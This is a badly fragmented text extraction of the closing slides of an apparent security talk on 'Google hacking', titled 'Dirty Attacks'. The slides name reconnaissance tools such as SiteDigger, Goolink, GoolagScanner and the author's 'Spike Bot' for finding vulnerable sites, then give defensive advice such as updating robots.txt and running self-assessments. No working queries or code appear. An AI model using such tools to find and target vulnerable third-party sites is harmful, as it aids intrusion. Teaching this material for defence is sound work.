with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking
Tools
--------------------------------
61. Dirty Attacks
With
Google hacking
Google Hacking Tools!
What is Google SiteDigger
Tools!
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking
Tools
--------------------------------
62. Dirty Attacks
With
Google hacking
Google Hacking Tools!
Goolink
–
This
is
very
handy
for
finding
vulnerable
site
wide
open
to
What is Google
Hacking?
google
and
googlebots!
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking
Tools
--------------------------------
63. Dirty Attacks
With
Google hacking
Google Hacking Tools!
What is Google GoolagScanner
–
Enable
to
Audit
Website
via
Google!
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking
Tools
--------------------------------
64. Dirty Attacks
With
Google hacking
Spike Bot – (By Me )!
What is Google
Hacking?
Google
Links
with
Spike
Bot !
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking
Tools
--------------------------------
65. Dirty Attacks
With
Google hacking
How to Protect Google Hacking!
What is Google Keep sensitive data off the web
Hacking?
Use common sense!! Basic security practices is all it
What a Hacker Can do
with vulnerable Web? takes. Defense in depth, act diligently when
Google Hacking
configuring web based devices and have a strong
Database (GHDB) corporate security policy
-------------------------------- Use Google hacking techniques to uncover your own
Google Hacking
basics
security problems. So…..Google hack yourself!
Google Advanced Perform periodic Google Assessments
Operators
– Update robots.txt
--------------------------------
Locating Exploits and
– Use meta-tags: NOARCHIVE
Finding Targets – http://www.google.com/remove.html
Tracking Down Web
Servers, Login
Work with Google for help in removing security
Portals, etc.. breaches. They are easy to work with and want to
Dirty Attacks using help! You can find contact info on their site
Googlebot
Google Hacking Tools
--------------------------------
66. Dirty Attacks
With
Google hacking
If someone is still in the room.. Q & A!
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
THANK YOU
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------